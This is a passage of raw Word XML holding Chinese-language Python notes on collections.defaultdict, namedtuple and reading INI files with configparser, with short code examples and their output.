          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidR="008A413F">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t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A4A32" w14:textId="77777777" w:rsidR="00723181" w:rsidRPr="008A413F" w:rsidRDefault="00723181" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231FF45E" w14:textId="075A4721" w:rsidR="00723181" w:rsidRDefault="00DF54A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A075F0" w14:textId="0B9FF82A" w:rsidR="00DF54A5" w:rsidRDefault="00DF54A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF54A5">
        <w:t>800ad30b2f135bc08ef225f1a0724d8f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274929C5" w14:textId="77777777" w:rsidR="00723181" w:rsidRDefault="00723181" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAF04BD" w14:textId="15EDDE72" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617B7BB3" w14:textId="761E18B9" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA76EEF" w14:textId="6650D79C" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466C6BB1" w14:textId="77777777" w:rsidR="00D63DCD" w:rsidRDefault="00D63DCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7254FCA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="_Toc159779900"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>collections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p w14:paraId="416D88FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="458" w:name="_Toc159779901"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defaultdict(lambda: None)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：默认键值为空的字典</w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w14:paraId="039D3A8E" w14:textId="77777777" w:rsidR="00A87C62" w:rsidRDefault="00A87C62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300B0636" w14:textId="5D6FE489" w:rsidR="00A87C62" w:rsidRDefault="00A87C62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A87C62">
        <w:t>from collections import defaultdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222CEEC2" w14:textId="41DC0079" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lambda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匿名函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D05FB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>single_license_dict = defaultdict(lambda: None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F3F3A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD6114C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他的和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用方法一样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78627815" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="_Toc159779902"/>
      <w:r>
        <w:t>namedtuple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可命名的元组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p w14:paraId="74A5B7E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>因为元组的局限性：不能为元组内部的数据进行命名，所以往往我们并不知道一个元组所要表达的意义</w:t>
      </w:r>
      <w:r>
        <w:t>，所以在这里引入了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> collections.namedtuple </w:t>
      </w:r>
      <w:r>
        <w:t>这个工厂函数，来构造一个带字段名的元组。具名元组的实例和普通元组消耗的内存一样多，因为字段名都被存在对应的类里面。这个类跟普通的对象实例比起来也要小一些，因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:t>不会用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> __dict__ </w:t>
      </w:r>
      <w:r>
        <w:t>来存放这些实例的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D5045" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4D2CD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">collections.namedtuple(typename, field_names, verbose=False, rename=False) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD789E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个具名元组子类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typename</w:t>
      </w:r>
      <w:r>
        <w:t>，其中参数的意义如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8F056" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59B8C9CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>typename</w:t>
      </w:r>
      <w:r>
        <w:t>：元组名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21222D37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">field_names: </w:t>
      </w:r>
      <w:r>
        <w:t>元组中元素的名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D60DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">rename: </w:t>
      </w:r>
      <w:r>
        <w:t>如果元素名称中含有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> python </w:t>
      </w:r>
      <w:r>
        <w:t>的关键字，则必须设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rename=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E9B581" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">verbose: </w:t>
      </w:r>
      <w:r>
        <w:t>默认就好</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE5110C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CBC484" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>下面来看看声明一个具名元组及其实例化的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243EB68D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EDF45A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>两种方法来给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> namedtuple </w:t>
      </w:r>
      <w:r>
        <w:t>定义方法名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3D75C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#User = collections.namedtuple('User', ['name', 'age', 'id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F299828" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User = collections.namedtuple('User', 'name age id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF33C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>user = User('tester', '22', '464643123')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732111E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C76BD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">collections.namedtuple('User', 'name age id') </w:t>
      </w:r>
      <w:r>
        <w:t>创建一个具名元组，需要两个参数，一个是类名，另一个是类的各个字段名。后者可以是有多个字符串组成的可迭代对象，或者是有空格分隔开的字段名组成的字符串（比如本示例）。具名元组可以通过字段名或者位置来获取一个字段的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FE213" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7410F919" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>输出结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A311A36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>User(name='tester', age='22', id='464643123')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C75345" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D26D1B" w14:textId="31CC24BA" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA9BDF9" w14:textId="78305AE9" w:rsidR="008710D9" w:rsidRDefault="00BB571F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="_Toc159779903"/>
      <w:r w:rsidRPr="00BB571F">
        <w:t>configparser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="460"/>
    </w:p>
    <w:p w14:paraId="02A30B03" w14:textId="2F01FED6" w:rsidR="008710D9" w:rsidRDefault="008710D9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436E3F6D" w14:textId="0E1BC288" w:rsidR="00D81E11" w:rsidRDefault="00D81E11" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件由两部分组成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">items </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D9139" w14:textId="349D358A" w:rsidR="00D81E11" w:rsidRDefault="00D81E11" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sections </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来区分不同的配置块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A2B6F" w14:textId="6068EEC7" w:rsidR="00BB571F" w:rsidRDefault="00D81E11" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">items </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面的键值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D90D5" w14:textId="7D49EAE1" w:rsidR="00BB571F" w:rsidRDefault="00BB571F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C4C016" w14:textId="35643E1D" w:rsidR="00BB571F" w:rsidRPr="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="_Toc159779904"/>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w14:paraId="7DDF9AD1" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from configparser import ConfigParser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06434B2D" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA7AB94" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>config = ConfigParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E2960" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入读取文件的地址，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件编码格式，中文必须</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A363532" w14:textId="609625AF" w:rsidR="00AB67D2" w:rsidRPr="00B91B7B" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>config.read('</w:t>
      </w:r>
      <w:r w:rsidR="008C2E54" w:rsidRPr="00B91B7B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>config.ini</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>', encoding='UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA39986" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B45AC21" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，不存在抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KeyError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE950F9" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">print('lang&gt;name:', </w:t>
      </w:r>
      <w:r w:rsidRPr="00027972">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>config['lang']['name']</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D411EA" w14:textId="612538E9" w:rsidR="00AB67D2" w:rsidRPr="00B652E8" w:rsidRDefault="00B652E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B652E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00B652E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> INI </w:t>
      </w:r>
      <w:r w:rsidRPr="00B652E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件读取的值默认为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFECFC" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>menu = config['menu']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F37B7A" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">print('menu&gt;officialSite:', menu['officialSite'])  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>officialSite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D4E1F1" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EECC699" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断配置文件中是否存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>menu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8BB294" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print('menu' in config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E86D2" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9702D2" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRPr="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>得到所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
    </w:p>
